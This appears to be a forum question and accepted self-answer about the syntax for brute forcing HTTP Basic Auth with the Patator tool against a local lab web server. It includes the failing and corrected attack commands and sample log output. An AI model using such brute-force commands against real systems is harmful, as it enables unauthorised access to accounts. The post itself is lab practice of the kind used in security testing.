# How to use Patator to brute force HTTP Basic Auth

Tags: passwords, brute-force, basic-authentication, hydra

I'm doing some password cracking experiments with different tools. I've a local set up within VMWare Workstation. I have a website protected by HTTP Basic Auth (A dialog pops up when i browse to it).

I'm struggling with the syntax of Patator though - I cant make it brute force the website (tools like Ncrack and Hydra worked OK). I have used it for SSH so i know the tool works, just can't figure the command for HTTP Basic Auth

```
patator http_fuzz auth_type=basic url=http://10.1.1.15 user_pass=FILE0:FILE0 0=./passwd_lists/user_pass.txt -x ignore:code=401
```

Where user_pass.txt contains a 'username':'password' separated by a colon

Basic Auth password is '123' and the user_pass.txt contain all permutations from 000 - 999, the username is consistent throughout. I can see Patator making 1000 attempts however they all fail with a HTTP 401

```
11:26:27 patator    INFO - 401  672:456        0.001 | molly:969                          |   970 | HTTP/1.1 401 Unauthorized
11:26:27 patator    INFO - 401  672:456        0.001 | molly:979                          |   980 | HTTP/1.1 401 Unauthorized
11:26:27 patator    INFO - 401  672:456        0.001 | molly:989                          |   990 | HTTP/1.1 401 Unauthorized
11:26:27 patator    INFO - 401  672:456        0.001 | molly:999                          |  1000 | HTTP/1.1 401 Unauthorized
11:26:28 patator    INFO - Hits/Done/Skip/Fail/Size: 1000/1000/0/0/1000, Avg: 732 r/s, Time: 0h 0m 1s
```

I think i have the command syntax incorrect, any help really appreciated.

Thanks

Answer (score 3, accepted):

Turns out i had the syntax incorrect, my user name and password were colon separated in one file, so the syntax should be

```
patator http_fuzz auth_type=basic url=http://10.1.1.15 user_pass=FILE0 0=./passwd_lists/user_pass.txt -x ignore:code=401
```

The difference being the single reference to to FILE0